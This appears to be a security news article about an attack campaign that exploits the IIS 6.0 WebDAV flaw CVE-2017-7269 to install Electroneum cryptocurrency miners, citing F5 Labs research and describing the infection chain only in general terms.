Hackers are leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mines the Electroneum cryptocurrency.
Attacks aren't widespread, as they target a quite old IIS version, but they are happening at scale.
Hackers are using CVE–2017–7269 to take over servers. This is a vulnerability discovered by two Chinese researchers in March 2017 that affects IIS' WebDAV service. At the time it was discovered last year, the flaw was a zero-day, being under heavy exploitation for almost nine months, since June 2016.
Microsoft initially said it was not planning to fix the flaw because IIS 6.0 was end-of-life, and so were the operating systems that shipped with IIS 6.0 by default —Windows XP and Windows Server 2003.
But the vulnerability shared some common traits with the EXPLODINGCAN NSA exploit leaked in April 2017 by the Shadow Brokers, and it eventually received a fix in mid-June 2017.
Since then, it's been used by at least one threat actor to deploy Monero miners on Windows servers still running the old IIS 6.0 version.
Now, F5 Labs says it found another hacker group using the same exploit, but deploying an Electroneum miner instead of Monero.
According to experts, the threat actor uses CVE–2017–7269 to deliver an ASCII shellcode which contains a Return-Oriented Programming (ROP) exploit chain that installs a reverse shell on vulnerable hosts.
Attackers then use the reverse shell to download the miner and start the mining process. The infection process is masked by the use of the Squiblydoo technique and by disguising the miner as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.
F5 experts said the Electroneum address they found in attacks stored only $99, suggesting they either caught the campaign at its beginning, or crooks are rotating address IDs to avoid researchers from tracking their entire operation.
These are also not the first crooks to mine Electroneum instead of Monero, the cryptocurrency of choice for all recent illegal mining campaigns. The Dofoil malware campaign also used Electroneum, and so did another coinminer campaign that used the legitimate CertUtil Windows utility to download the mining malware on user's systems.